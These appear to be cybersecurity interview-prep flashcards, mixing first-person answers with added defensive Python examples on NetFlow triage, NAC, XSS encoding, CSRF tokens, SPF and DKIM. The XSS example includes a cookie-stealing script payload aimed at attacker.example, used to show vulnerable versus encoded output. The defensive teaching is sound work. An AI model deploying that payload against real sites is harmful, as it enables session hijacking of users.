Other Technical stuff Flashcards

1
Q

What can NetFlow be used for

A

Unusual data transfers: flows whose volume or direction differs from what the source host normally produces.

Unusual destinations: traffic to hosts, networks or countries the source has never talked to before.

Large transfers: a single flow, or a short series of flows, moving far more data than the host's baseline; a common exfiltration signal.

Unusual protocols: traffic on protocols or ports the host or segment has no business using (for example SMB or RDP leaving the network).

Off-hours activity: flows starting outside the hours when the host's user is normally active.

Data encryption: NetFlow records carry no payload, so encryption is inferred from ports and protocols (unexpected TLS or SSH sessions), not observed directly.

User accounts and anomalies: flow data correlated with authentication logs to tie suspicious traffic to an account.

Security alerts and alarms: flow records as the input to threshold and anomaly rules that raise alerts.

Historical baseline comparison: today's flows compared against a per-host or per-segment baseline built from past exports.

File and folder access logs: not something NetFlow itself provides; host file-access logs are correlated with flow records to learn what a suspicious transfer actually contained.
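
Added example, not part of the original flashcards: a small triage pass over constructed NetFlow-style records that applies the indicators above (large transfer, unusual destination, unusual port, off-hours, and the encryption inference). The baseline figures, business hours, port list and sample flows are all invented; in practice the baseline comes from past exports and the records from a decoded v5/v9/IPFIX feed.

```python
"""Flow-record triage over constructed NetFlow-style records (added example).
Assumes the exporter's records have already been decoded into dicts; every
number and address below is constructed for illustration."""
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network

# Constructed baseline: what "normal" looked like last month for each host.
BASELINE = {
    "10.0.1.25": {"avg_bytes_out": 2_000_000, "known_dsts": {"10.0.2.10", "192.0.2.10"}},
    "10.0.1.30": {"avg_bytes_out": 500_000, "known_dsts": {"10.0.2.10"}},
}
INTERNAL = ip_network("10.0.0.0/8")
EXPECTED_PORTS = {80, 443, 53, 445, 25}   # assumption: what this segment normally uses
BUSINESS_HOURS = range(8, 19)             # 08:00-18:59 local time

# Constructed sample flows; "start" is the flow start time in local time.
FLOWS = [
    {"src": "10.0.1.25", "dst": "10.0.2.10", "dport": 445, "proto": 6, "bytes": 1_500_000, "start": "2024-03-04T10:15:00"},
    {"src": "10.0.1.25", "dst": "203.0.113.9", "dport": 443, "proto": 6, "bytes": 25_000_000, "start": "2024-03-04T02:40:00"},
    {"src": "10.0.1.30", "dst": "10.0.2.10", "dport": 53, "proto": 17, "bytes": 2_000, "start": "2024-03-04T11:00:00"},
    {"src": "10.0.1.30", "dst": "198.51.100.7", "dport": 4444, "proto": 6, "bytes": 30_000, "start": "2024-03-04T14:05:00"},
]


def triage_flow(flow, baseline=BASELINE):
    """Return the list of indicator names a single flow trips."""
    findings = []
    base = baseline.get(flow["src"])
    external = ip_address(flow["dst"]) not in INTERNAL
    hour = datetime.fromisoformat(flow["start"]).hour

    if base and flow["bytes"] > 5 * base["avg_bytes_out"]:
        findings.append("large_transfer")            # historical baseline comparison
    if base and flow["dst"] not in base["known_dsts"]:
        findings.append("unusual_destination")
    if flow["dport"] not in EXPECTED_PORTS:
        findings.append("unusual_port")              # stands in for "unusual protocol"
    if hour not in BUSINESS_HOURS:
        findings.append("off_hours")
    # Flow records carry no payload, so "encrypted exfiltration" can only be
    # inferred from port plus volume plus direction; this flags, it does not decide.
    if external and flow["dport"] == 443 and flow["bytes"] > 10_000_000:
        findings.append("large_tls_egress")
    return findings


def triage(flows, baseline=BASELINE):
    """Map src -> list of (dst, findings) for every flow that tripped something."""
    report = defaultdict(list)
    for flow in flows:
        hits = triage_flow(flow, baseline)
        if hits:
            report[flow["src"]].append((flow["dst"], hits))
    return dict(report)


if __name__ == "__main__":
    for src, items in triage(FLOWS).items():
        for dst, hits in items:
            print(f"{src} -> {dst}: {', '.join(hits)}")
```

The two benign flows produce nothing; the 25 MB off-hours TLS session to a never-seen external address trips four indicators at once, which is the kind of stacking a baseline comparison is for, while the small connection to port 4444 is caught on destination and port alone.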

2
Q

What experience do you have with SIEMs

A

The only exposure to a SIEM in a professional sense is getting the alerts that an account lockout event has occurred, and then investigating the incident.

From an academic perspective, I have reviewed SIEM alerts as part of my Security+ studies.

3
Q

What experience do you have with IDS/IPS

A

As part of my Security+ studies, I have been exposed to IPS alerts, and was expected to interpret them and select the answer that best summarizes what the alert is indicating.

I also have exposure to Security Onion, which is an open-source IPS, where I had to report out my findings for an assignment that required me to reconstruct an event.

4
Q

What experience do you have with Vulnerability Scanners

A

I have used OpenVAS in class to scan for and find vulnerabilities on my own machines, and also on the machines of other students. I would then use this information to patch my systems or launch attacks on the other students' systems.

5
Q

What experience do you have with Endpoint security

A

I have worked with McAfee ePO to investigate user-reported security events, and I have experience troubleshooting the agents and installing the agent on workstations.

My company, Centaris, has a similar offering for its clients, and I would routinely receive alerts to investigate and troubleshoot agent issues.

6
Q

What experience do you have with email security

A

I would regularly work within Proofpoint to review emails that were blocked based on pre-set policies. I would look into the information within the email header, and work with the employees to determine whether the email was safe to forward, or whether it was spam/phishing.

7
Q

What experience do you have with Metasploit

A

I had to develop a plan of attack for my final in my attack-and-defend class. I had to learn how to use Metasploit to attack machines.

I can use Metasploit to scan devices for exploitable vulnerabilities, and can run exploits against machines.

8
Q

What experience do you have with Nmap

A

Scanning for OSes

Scanning for open ports

Scanning for services running on machines

9
Q

Explain the use of NAC

A

Purpose: NAC is a security solution that ensures only authorized and compliant devices can access a network. It provides network administrators with the means to enforce security policies and maintain control over who and what can connect to the network.

Key Functions:

Device Authentication: NAC verifies the identity of devices trying to connect to the network, ensuring they are legitimate and meet security requirements.

Policy Enforcement: It enforces security policies, such as ensuring endpoint devices have up-to-date antivirus software, the latest patches, and proper configurations before granting access.

Quarantine and Remediation: If a device doesn’t meet security requirements, NAC can quarantine it in a segregated network segment (quarantine VLAN) and initiate remediation actions to bring it into compliance.

Continuous Monitoring: NAC continually monitors devices on the network, detecting changes in compliance status and reacting accordingly.

Components: NAC typically includes components like an authentication server, policy enforcement points (often within network switches or access points), and a management console for configuring policies and monitoring compliance.

10
Q

Explain 802.1X

A

Purpose: 802.1X is an IEEE standard used for port-based network access control. It ensures that only authenticated devices can access network services by controlling access at the network port level.

Key Functions:

Port Authentication: 802.1X requires a device to authenticate before it is granted access through a network port, such as an Ethernet switch port or a wireless association. Until then the port passes only the authentication frames themselves.

Authentication Protocols: It carries EAP (Extensible Authentication Protocol) between the device and the port (EAPOL), which leaves the choice of authentication method open, for example EAP-TLS with certificates or PEAP with passwords.

Dynamic VLAN Assignment: 802.1X can place a device in a specific VLAN based on the authentication result, segregating it into the appropriate network segment.

Components: 802.1X involves three main components:

Supplicant: The client device (e.g., a laptop or smartphone) that seeks access to the network.

Authenticator: The network device (e.g., a switch or access point) that blocks everything except EAPOL on the port until authentication succeeds.

Authentication Server: The server, usually RADIUS, that verifies the supplicant's credentials and tells the authenticator whether to grant access and, optionally, which VLAN to assign.

11
Q

How do NAC and 802.1X work together

A

NAC solutions often leverage 802.1X as a key mechanism for authenticating devices at the network port level.
When a device connects to a network port, 802.1X is used to perform authentication. If successful, the device is granted access.
NAC then assesses the device’s overall compliance with security policies. If the device passes this assessment, it is granted full access to the network. If not, NAC may relegate it to a quarantine network until it meets compliance requirements.
In summary, NAC and 802.1X are complementary: 802.1X answers "who is this device?" at the port, while NAC answers "is it allowed on, and in what state?" by adding policy enforcement, monitoring and remediation for as long as the device stays connected.
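
Added example, not part of the original flashcards: a toy model of the decision chain the three cards above describe. The supplicant hands an identity and secret to the authenticator, the authenticator asks the authentication server, and only after an accept does the NAC posture check decide between the assigned VLAN and the quarantine VLAN. The user database, posture rules, VLAN numbers and the guest-VLAN-on-failure behaviour are constructed assumptions standing in for a real EAP method and RADIUS exchange.

```python
"""Toy 802.1X + NAC decision flow (added example, not the flashcards' own code).
Credentials, posture rules and VLAN numbers are constructed stand-ins."""
from dataclasses import dataclass, field
from typing import Optional

QUARANTINE_VLAN = 999   # assumption: reaches remediation servers only
GUEST_VLAN = 50         # assumption: internet only, used when auth fails

# Constructed authentication-server database: identity -> (secret, VLAN on success).
USERS = {"alice": ("correct-horse", 10), "printer-07": ("mac-bypass-token", 20)}


@dataclass
class Supplicant:
    identity: str
    secret: str
    av_current: bool
    missing_critical_patches: int


@dataclass
class PortState:
    authorized: bool = False
    vlan: Optional[int] = None
    reasons: list = field(default_factory=list)


def authentication_server(identity, secret):
    """Stand-in for RADIUS: returns (accept?, vlan) like Access-Accept / Access-Reject."""
    rec = USERS.get(identity)
    if rec is None or rec[0] != secret:
        return False, None
    return True, rec[1]


def nac_posture(dev):
    """NAC policy enforcement: list every compliance problem the device has."""
    problems = []
    if not dev.av_current:
        problems.append("antivirus out of date")
    if dev.missing_critical_patches > 0:
        problems.append(f"{dev.missing_critical_patches} critical patch(es) missing")
    return problems


def authenticator(dev, guest_on_fail=True):
    """Port-based control: the port stays unauthorized until the server accepts,
    then NAC decides which VLAN the authorized port lands in."""
    port = PortState()
    ok, vlan = authentication_server(dev.identity, dev.secret)
    if not ok:
        port.reasons.append("802.1X authentication failed")
        if guest_on_fail:
            port.authorized, port.vlan = True, GUEST_VLAN
        return port
    port.authorized = True
    problems = nac_posture(dev)
    if problems:
        port.vlan = QUARANTINE_VLAN
        port.reasons.extend(problems)
    else:
        port.vlan = vlan
    return port


def reassess(port, dev):
    """Continuous monitoring: an authorized device that drifts out of compliance
    is moved to quarantine; guest and unauthorized ports are left alone."""
    if not port.authorized or port.vlan in (GUEST_VLAN, None):
        return port
    problems = nac_posture(dev)
    if problems:
        port.vlan = QUARANTINE_VLAN
        port.reasons = problems
    return port


if __name__ == "__main__":
    laptop = Supplicant("alice", "correct-horse", av_current=True, missing_critical_patches=0)
    print(authenticator(laptop))
    laptop.av_current = False
    print(reassess(authenticator(laptop), laptop))
```

The separation matters operationally: a wrong password is an 802.1X failure and never reaches the posture check, while a valid user on an unpatched machine authenticates fine and is still kept off the production VLAN.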

12
Q

Can you provide examples of how you’ve collaborated with IT infrastructure teams to implement security measures without disrupting the organization’s operations?

A

At my former job we coordinated with leaders from each department to update the NTFS permissions and group policies for their network drives. We had to do this in a way that was as minimally intrusive as possible.

13
Q

What role does risk assessment play in your approach to cybersecurity, and how do you prioritize security measures based on potential risks?

A

Risk assessments are essential to understanding and prioritizing security measures within an organization. Risk is where vulnerabilities meet threats. If a system has a vulnerability but the threat of exploitation is low, I would prioritize a system that has a vulnerability and also has the potential of being exploited by a threat actor. Mission-critical systems that are high risk should take priority over any other system.

14
Q

How would you address the challenge of ensuring security while allowing for the agility required in modern IT environments, including cloud services and remote work?

A

I believe that the balance and agility come from working closely with the department leaders to identify their needs and desires and balance those with security. When an impasse is reached, having a framework to address and work through the issues is key to success.

15
Q

What is XSS and what are its types

A

XSS exploits the trust a user's browser has in a web site: script that the site delivers runs with that site's privileges.

XSS is a type of security vulnerability commonly found in web applications. It occurs when an attacker injects malicious script (usually JavaScript) into web content that is then viewed by other users. The script runs in the context of the victim's browser, allowing the attacker to steal information, manipulate the page, or perform actions on behalf of the user.

Reflected XSS: The injected script is embedded in a URL or form submission and reflected back by the web server, affecting users who click a malicious link or submit a manipulated form.

Stored XSS: The injected script is permanently stored on the target server (a comment, a profile field) and served to every user who accesses the affected page.

DOM-based XSS: The script is injected by client-side code that writes untrusted data (often from the URL) into the page, so the payload may never reach the server at all.

16
Q

What is CSRF and its types

A

CSRF is another web application vulnerability; it exploits the trust a web site has in a user's browser. In a CSRF attack, an attacker tricks a user into unknowingly making an unwanted request to a web application where the user is authenticated, so the browser attaches the session cookie and the action is performed on the user's behalf without their consent.

Standard: The attacker uses social engineering to trick the user into performing an action they did not intend on the target site.

Blind: The attacker launches the CSRF attack without being able to see the outcome (e.g., changing a user's email address without being able to confirm that the change happened).

17
Q

How do you mitigate XSS

A

Input validation: Reject or normalize input that does not match what the field expects (allowlisted characters, length, format) before it is stored or used.

Output encoding: Encode data for the context it is rendered into (HTML body, attribute, JavaScript, URL) before writing it to the page, so the browser treats it as text rather than markup or script. The encoding must match the context; HTML entity encoding alone does not make a value safe inside a script block.
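
Added example, not part of the original flashcards: the same reflected value rendered three ways. The first template concatenates it raw and is the vulnerable case; the second applies HTML entity encoding, which is right for an attribute and for the element body; the third shows that the script-block context needs a different encoding. The template, the payload and the allowlist used for input validation are constructed for illustration.

```python
"""Reflected XSS: unsafe rendering beside context-appropriate encoding
(added example, not the flashcards' own code). Template and payload are constructed."""
import html
import json
import re

# Constructed attacker input: breaks out of the value="" attribute, then injects a script.
PAYLOAD = '"><script>document.location="https://attacker.example/?c="+document.cookie</script>'


def render_vulnerable(query):
    """Raw concatenation: the value becomes markup, so the payload is executed."""
    return f'<input name="q" value="{query}"><p>Results for {query}</p>'


def render_encoded(query):
    """html.escape(quote=True) turns < > & " ' into entities, so the value stays
    text in both the attribute context and the element-body context."""
    safe = html.escape(query, quote=True)
    return f'<input name="q" value="{safe}"><p>Results for {safe}</p>'


def render_into_script(query):
    """Script-block context: serialise as a JSON string literal and escape "</"
    so the browser cannot close the <script> element early. Entity encoding
    would be wrong here because entities are not decoded inside <script>."""
    literal = json.dumps(query).replace("</", "<\\/")
    return f"<script>var q = {literal};</script>"


def validate_query(query):
    """Input validation with an allowlist (constructed rule for a search box):
    letters, digits, underscore, space, dot and hyphen, 1 to 64 characters."""
    return re.fullmatch(r"[\w .-]{1,64}", query) is not None


def count_script_tags(markup):
    """Crude indicator used in the test: how many <script openings reach the browser."""
    return markup.lower().count("<script")


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_encoded(PAYLOAD))
    print(render_into_script(PAYLOAD))
```

Validation and encoding are separate controls: the allowlist rejects this payload outright, but a field that legitimately accepts quotes or angle brackets still depends entirely on the output encoding being correct for where the value ends up.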

18
Q

How do you mitigate CSRF

A

Same-Site Cookies: Set the session cookie's SameSite attribute (Lax or Strict) so the browser does not send it on cross-site requests. On its own this is not a complete defence, so state-changing requests should also carry an anti-CSRF token tied to the session, and the server should check that the Origin (or Referer) header is its own.
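
Added example, not part of the original flashcards: the three controls just listed in stdlib Python, so the pieces are visible without a framework. The cookie header is emitted with SameSite, the token is an HMAC over the session id so a token lifted from one session is useless in another, and the request check combines a constant-time token comparison with an Origin/Referer check. The server secret, site origin, session id and request headers are constructed.

```python
"""CSRF defences: SameSite cookie, synchroniser token, Origin check
(added example, not the flashcards' own code). Secret and origin are constructed."""
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie
from urllib.parse import urlparse

SERVER_SECRET = secrets.token_bytes(32)    # constructed per-deployment key
SITE_ORIGIN = "https://app.example"        # constructed: our own origin


def session_cookie_header(session_id):
    """Set-Cookie line with SameSite=Lax, Secure and HttpOnly, so the browser
    omits the cookie on cross-site POSTs and script cannot read it."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["secure"] = True
    cookie["session"]["httponly"] = True
    cookie["session"]["samesite"] = "Lax"
    return cookie.output(header="Set-Cookie:").strip()


def csrf_token(session_id):
    """Synchroniser token bound to the session: HMAC-SHA256 of the session id
    under the server secret, embedded in every state-changing form."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _origin_of(referer):
    parts = urlparse(referer)
    return f"{parts.scheme}://{parts.netloc}"


def request_allowed(session_id, form_token, origin_header=None, referer_header=None):
    """Allow a state-changing request only if the form token matches the session's
    token (compared in constant time) and the request's Origin, or Referer when
    Origin is absent, is our own site."""
    expected = csrf_token(session_id)
    if not form_token or not hmac.compare_digest(expected, form_token):
        return False
    source = origin_header or (_origin_of(referer_header) if referer_header else None)
    return source == SITE_ORIGIN


if __name__ == "__main__":
    sid = "sess-123"
    print(session_cookie_header(sid))
    print(request_allowed(sid, csrf_token(sid), origin_header=SITE_ORIGIN))
    print(request_allowed(sid, csrf_token(sid), origin_header="https://evil.example"))
```

A cross-site form post from evil.example fails twice here: the browser withholds the Lax cookie, and even if it did not, the attacker cannot read the token or forge the Origin header.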

19
Q

What does DKIM do

A

DomainKeys Identified Mail (DKIM) is another email authentication method that focuses on email message integrity and sender authenticity. Here’s how DKIM works:

Digital Signature: The sender’s email server adds a digital signature to the email header using a private key. This signature is generated based on the content of the email, including the body and selected header fields.

Public Key in DNS: The sender’s domain publishes a public key in DNS, which can be used to verify DKIM signatures.

Incoming Email: When the recipient's mail server receives the email, it reads the signing domain (d=) and selector (s=) from the DKIM-Signature header and retrieves the matching public key from DNS.

Signature Verification: The recipient’s server uses the public key to verify the digital signature in the email header. If the signature is valid and matches the email’s content, the email is considered authentic.

20
Q

What does SPF do

A

Sender Policy Framework (SPF) is an email authentication method used to prevent email spoofing and phishing attacks. It works by allowing domain owners to specify which mail servers are authorized to send emails on behalf of their domain. Here’s how SPF works:

DNS Record: The domain owner publishes an SPF record in their DNS settings. This record contains information about the authorized mail servers that are allowed to send emails for that domain.

Incoming Email: When an email is received by the recipient’s mail server, the server checks the SPF record of the sender’s domain by querying DNS.

SPF Check: The recipient's server compares the IP address of the connecting mail server with the hosts authorized in the SPF record. If the sending server is not listed, the record's final qualifier decides the outcome: "-all" is a hard fail, "~all" a soft fail that is usually only a scoring signal. The domain checked is the envelope sender (MAIL FROM), which is why SPF alone does not protect the visible From header.

21
Q

What does SPF accomplish

A

Anti-Spoofing: SPF helps prevent email spoofing, where attackers send emails that appear to be from a legitimate domain.
Phishing Prevention: It reduces the likelihood of phishing attacks by verifying the authenticity of the sender’s domain.
Email Reputation: SPF records can also be used by email receivers to assess the reputation of a sending domain.
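
Added example, not part of the original flashcards, covering the two SPF cards above: an evaluator for the ip4, ip6, include and all mechanisms, run against a constructed DNS TXT table so it works offline. Real SPF also has the a, mx, exists and ptr mechanisms and the redirect modifier, which this block leaves out; it does enforce the RFC 7208 limit of ten DNS-querying terms, which is the check that catches recursive or bloated records.

```python
"""SPF evaluation over a constructed DNS table (added example, not the
flashcards' own code). Supports ip4, ip6, include and all with qualifiers."""
from ipaddress import ip_address, ip_network

# Constructed DNS: domain -> its SPF TXT record.
DNS_TXT = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.mailer.example -all",
    "_spf.mailer.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all",
    "loop.example": "v=spf1 include:loop.example -all",   # pathological record
}
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAX_LOOKUPS = 10   # RFC 7208 section 4.6.4


def check_spf(domain, sender_ip, _lookups=None):
    """Return the SPF result (pass, fail, softfail, neutral, none, permerror)
    for sender_ip claiming to send mail as domain."""
    lookups = _lookups if _lookups is not None else [0]
    record = DNS_TXT.get(domain)
    if record is None or not record.startswith("v=spf1"):
        return "none"
    ip = ip_address(sender_ip)

    for term in record.split()[1:]:
        if term[0] in QUALIFIERS:
            qualifier, mech = term[0], term[1:]
        else:
            qualifier, mech = "+", term          # default qualifier is "+"
        result = QUALIFIERS[qualifier]

        if mech == "all":
            return result                        # "all" always matches
        name, _, arg = mech.partition(":")
        if name in ("ip4", "ip6"):
            net = ip_network(arg, strict=False)
            if ip.version == net.version and ip in net:
                return result
        elif name == "include":
            lookups[0] += 1                      # include costs a DNS lookup
            if lookups[0] > MAX_LOOKUPS:
                return "permerror"
            sub = check_spf(arg, sender_ip, lookups)
            if sub in ("permerror", "none"):     # RFC: missing include target is a permerror
                return "permerror"
            if sub == "pass":
                return result
        # a, mx, exists, ptr and modifiers are not implemented here and are skipped
    return "neutral"                             # no mechanism matched and no "all"


if __name__ == "__main__":
    for ip in ("192.0.2.77", "198.51.100.10", "2001:db8:1::5", "203.0.113.9"):
        print(ip, check_spf("example.com", ip))
```

The include chain is where most production SPF trouble lives: a shared mailer's record pulled in by the include can itself include others, and once the lookup count passes ten the whole record evaluates to permerror rather than pass, which receivers treat as no protection at all.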

22
Q

What does DKIM help accomplish

A

Message Integrity: DKIM ensures that the email message has not been tampered with during transit.
Sender Authentication: It verifies that the email was indeed sent by the claimed sender’s domain, reducing the risk of phishing.
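
Added example, not part of the original flashcards, covering the two DKIM cards above: the body-hash (bh=) half of DKIM verification with both body canonicalisations from RFC 6376. It parses the DKIM-Signature tag list, canonicalises the received body and compares the SHA-256 digest with what the signer recorded, which is exactly the "message integrity" property. Verifying the b= signature over the headers additionally needs the selector's public key from DNS and an RSA or Ed25519 implementation, which this stdlib-only block does not include; the signing function below is a constructed stand-in that emits only the tags this check needs.

```python
"""DKIM body-hash verification with simple and relaxed canonicalisation
(added example, not the flashcards' own code). The message is constructed
and the b= value is a placeholder; only bh= is checked here."""
import base64
import hashlib
import re


def canonicalize_body(body, mode="simple"):
    """RFC 6376 3.4.3 (simple) and 3.4.4 (relaxed) body canonicalisation."""
    lines = body.split("\r\n")
    if mode == "relaxed":
        # collapse runs of whitespace to one space and strip trailing whitespace
        lines = [re.sub(r"[ \t]+", " ", line).rstrip(" \t") for line in lines]
    while lines and lines[-1] == "":          # drop empty lines at the end
        lines.pop()
    if not lines:
        return "\r\n" if mode == "simple" else ""
    return "\r\n".join(lines) + "\r\n"        # body always ends with one CRLF


def body_hash(body, mode="simple"):
    """bh= value: base64(SHA-256(canonicalised body))."""
    digest = hashlib.sha256(canonicalize_body(body, mode).encode()).digest()
    return base64.b64encode(digest).decode()


def parse_dkim_tags(header_value):
    """Turn 'v=1; a=rsa-sha256; c=relaxed/relaxed; bh=...; b=...' into a dict,
    removing the folding whitespace that long base64 values pick up in transit."""
    tags = {}
    for part in header_value.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip()] = re.sub(r"\s+", "", value)
    return tags


def build_signed_message(body, body_mode="relaxed"):
    """Constructed signer: writes the DKIM-Signature header with a real bh= and a
    placeholder b=, since the header signature needs a private key."""
    header = (f"v=1; a=rsa-sha256; c=relaxed/{body_mode}; d=example.com; s=sel1; "
              f"h=from:to:subject; bh={body_hash(body, body_mode)}; b=PLACEHOLDER")
    return (f"DKIM-Signature: {header}\r\nFrom: alice@example.com\r\n"
            f"To: bob@example.net\r\nSubject: numbers\r\n\r\n{body}")


def verify_body_hash(message):
    """True when the body as received still hashes to the signer's bh= value."""
    headers, _, body = message.partition("\r\n\r\n")
    sig = next((h for h in headers.split("\r\n")
                if h.lower().startswith("dkim-signature:")), None)
    if sig is None:
        return False
    tags = parse_dkim_tags(sig.split(":", 1)[1])
    body_mode = tags.get("c", "simple/simple").partition("/")[2] or "simple"
    return tags.get("bh") == body_hash(body, body_mode)


if __name__ == "__main__":
    msg = build_signed_message("Quarterly numbers attached.\r\n\r\nThanks,\r\nAlice\r\n")
    print(verify_body_hash(msg), verify_body_hash(msg.replace("Quarterly", "Doctored")))
```

Relaxed canonicalisation is the one most signers choose because mailing lists and relays that re-wrap whitespace would otherwise break every signature; as the test shows, it tolerates a collapsed double space where simple mode does not, while any change to the actual words still fails.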

23
Q

Why is patch management important

A

Regular patch management is critical to ensuring the security posture of the environment. Patches regularly resolve security vulnerabilities and make systems more stable.

24
Q

What are the steps to patch management

A

Identify patches using a feed of information from vendors and open-source sites.

Prioritize patching by the risk the unpatched vulnerability presents to the system.

Test in a sandbox.

Schedule the update window.

Back up the system and confirm the rollback plan before touching production.

Apply the patch.

Monitor the system.

Document what was patched, when, and the outcome.

25
Q

What are the steps to handle a potential data breach

A
  1. Document every step taken before, during and after the discovery.
  2. Preserve evidence.
  3. Notify the IT Security Manager following the escalation process.
  4. Determine whether there is evidence that the breach is ongoing by searching for network artifacts such as firewall logs, web application logs, unusual traffic patterns, NetFlow logs, malware scans and user authentication logs on the devices under suspicion.
  5. If it is ongoing, isolate the affected systems.
  6. Engage the response team.
  7. Determine the scope.
  8. Identify the attack vector.
  9. Contain and eradicate.

26
Q

What are the benefits of a SIEM

A

A SIEM will aggregate logs from different devices across the network in order to analyze and report on them.

A SIEM assists in threat detection making use of rules, and behavioral analysis.

Integration with existing infrastructure, and a solution that scales as the environment grows.

Enhanced visibility into environment and security posture.

27
Q

How do you handle strange traffic on a firewall

A

Identify the alert and establish whether it is a true or false positive.

Isolate the affected system if the alert looks genuine.

Analyze the outbound traffic: review the IP addresses, port information, protocols and payload data.

Determine the nature of the traffic: does it belong to a known application or service, or is it unrelated and potentially malicious?

Check for malware and compromise: review AV scan results, running processes, logs and the system registry.

Identify the cause: perform root cause analysis to find the actual root of the issue.

Assess the impact.

Contain and remediate.

28
Q

How would you respond to a DDOS attack

A

Identify and confirm the attack (distinguish it from a legitimate traffic spike or an outage).

Alert the relevant teams.

Isolate the affected systems.

Divert traffic, apply rate limiting, or spin up additional cloud resources to absorb the load.

Implement countermeasures such as firewall or IPS rules that drop the attack pattern, and ask the ISP or a DDoS scrubbing service to filter upstream when the attack saturates the link before it reaches your equipment.

29
Q

What are some DDOS countermeasures

A

Load balancing and a content delivery network in front of web applications, so the attack is spread across many nodes and absorbed at the edge.

Traffic analysis to spot the attack pattern (source, protocol, request type) and build a filter for it.

Rate limiting per source or per request type, which blunts application-layer floods but not volumetric attacks that fill the link.

30
Q

How would you respond to an un-authorized device connecting to the network

A

Isolate the device by disabling the network port it is plugged into.

Capture information such as which switch and port it connected to, its MAC address, and its IP and DHCP lease details. Pull the MAC table and DHCP records promptly, since the switch ages those entries out once the port is down.

Investigate the information gathered (vendor OUI, hostname, what the device tried to reach).

Assess the information for threats.

Escalate and remediate the situation.
